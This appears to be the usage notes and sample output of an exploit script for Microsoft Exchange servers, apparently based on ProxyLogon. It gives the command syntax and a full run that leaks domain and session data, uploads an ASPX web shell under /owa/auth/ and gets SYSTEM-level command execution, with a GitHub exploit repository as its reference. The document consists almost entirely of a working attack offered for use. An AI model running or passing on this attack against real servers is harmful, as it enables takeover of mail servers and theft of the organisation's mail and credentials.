Usage
python3 .\exchange-exp.py
--------------------------------------------------------------------------------
| |
| Usage: python .\exchange-exp.py <target> <email>
| Usage: python .\exchange-exp.py mail.exchange.cn [email protected]
| |
--------------------------------------------------------------------------------
PS C:\> python3 .\exchange-exp.py mail.exchange.cn [email protected]
[*] Getting ComputerName and DomainName
[+] domain : xxx-xxxx
|
[+] computer : xxx.xxx-xxxx.xxx
|
[*] Getting LegacyDN
[+] LegacyDN : /o=SCHMIDT-STEUER/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=06404e2e5d114531aa9477394e545b72-Administr
|
[*] Getting SID
[+] SID : xxxxx
|
[*] Getting session
[+] session : xxxxx
|
[*] Getting msExchEcpCanary
[+] msExchEcpCanary : xxxxxx
|
[*]Got OAB id
[+] OAB : xxxxxx
|
[*]upload shell success
POST shell:https://target/owa/auth/qwesdSDFASFQqeqweqsf.aspx
|
[+] request shell now
|
[*]Got shell success
|
[+] 权限如下:nt-autorit\system
|
[+] input exit or quit to exit !
PS C:\> hostname
exchange
PS C:\>
Reference:
https://github.com/sirpedrotavares/Proxylogon-exploit